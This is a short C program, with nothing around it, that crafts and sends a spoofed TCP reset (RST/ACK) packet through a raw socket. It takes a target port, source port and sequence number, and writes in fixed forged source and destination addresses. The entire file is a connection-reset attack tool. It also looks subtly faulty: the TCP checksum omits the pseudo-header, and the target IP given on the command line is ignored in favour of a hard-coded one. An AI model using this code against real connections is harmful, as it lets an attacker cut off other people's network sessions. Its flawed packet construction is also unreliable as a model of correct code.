#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/tcp.h>
#include <linux/ip.h>
#include <netinet/in.h>
#include <stdlib.h>

#define BUFSIZE 512

int tcp_reset(struct sockaddr_in *, int, u_int32_t);
u_short in_checksum(unsigned short *, int);

int main(int argc, char **argv)
{

	struct sockaddr_in dest;

	if (argc != 5) {

		printf("Usage: %s <ip> <port> <sport> <seq>\n", argv[0]);
		exit(1);

	}

	dest.sin_family = AF_INET;
	dest.sin_addr.s_addr = inet_addr(argv[1]);
	dest.sin_port = htons(atoi(argv[2]));
	
	if (tcp_reset(&dest, atoi(argv[3]), strtod(argv[4], NULL)) != 0) {

		printf("Send failed\n");
		exit(1);

	}

	printf("Packet sent\n");

	exit(0);

}

int tcp_reset(struct sockaddr_in *dst, int sport, u_int32_t seq)
{

	int sockfd, pktlen;
	const int on = 1;
	struct tcphdr tcphdr;
	struct iphdr iphdr;
	char sendbuf[BUFSIZE];

	// Build IP header

	memset(&iphdr, '\0', sizeof(struct iphdr));

	iphdr.version	= 4;
	iphdr.ihl	= 5;
	iphdr.tos	= 0;
	iphdr.tot_len	= htons(40);
	iphdr.id	= rand() & 0xffff;
	iphdr.frag_off	= 0;
	iphdr.ttl	= 255;
	iphdr.protocol	= IPPROTO_TCP;
	iphdr.saddr	= inet_addr("192.168.0.3");
	iphdr.daddr	= inet_addr("192.168.0.4");
	iphdr.check	= 0;
	iphdr.check 	= in_checksum((unsigned short *) &iphdr, sizeof(struct iphdr));

	// Build TCP header

	memset(&tcphdr, '\0', sizeof(struct tcphdr));

	tcphdr.source 	= htons(sport);
	tcphdr.dest	= dst->sin_port;
	tcphdr.seq	= htonl(0);
	tcphdr.ack_seq	= htonl(seq);
	tcphdr.doff	= 5;
	tcphdr.rst	= 1;
	tcphdr.ack	= 1;
	tcphdr.window	= htons(1024);
	tcphdr.urg_ptr  = 0;
	tcphdr.check	= 0;
	tcphdr.check 	= in_checksum((unsigned short *) &tcphdr, sizeof(struct tcphdr));

	// Send packet

	memset(sendbuf, '\0', BUFSIZE);

	memcpy(sendbuf, &iphdr, sizeof(struct iphdr));

	memcpy(sendbuf + sizeof(iphdr), &tcphdr, sizeof(struct tcphdr));
	
	if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {

		perror("socket");
		return 1;

	}

	if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {

		perror("setsockopt");
		return 1;

	}

	pktlen = sizeof(struct iphdr) + sizeof(struct tcphdr);

	if (sendto(sockfd, &sendbuf, pktlen, 0, (struct sockaddr *)dst, sizeof(struct sockaddr_in)) < 0) {

		perror("sendto");
		return 1;

	}

	close(sockfd);

	return 0;

}

u_short in_checksum(unsigned short *addr, int len)
{

	int nleft = len;
	int sum = 0;
	unsigned short *w = addr;
	u_short answer = 0;

	while (nleft > 1) {

		sum += *w++;
		nleft -= 2;

	}

	if (nleft == 1) {

		answer = *(u_short *) w;
		sum += answer;

	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return (answer);

}
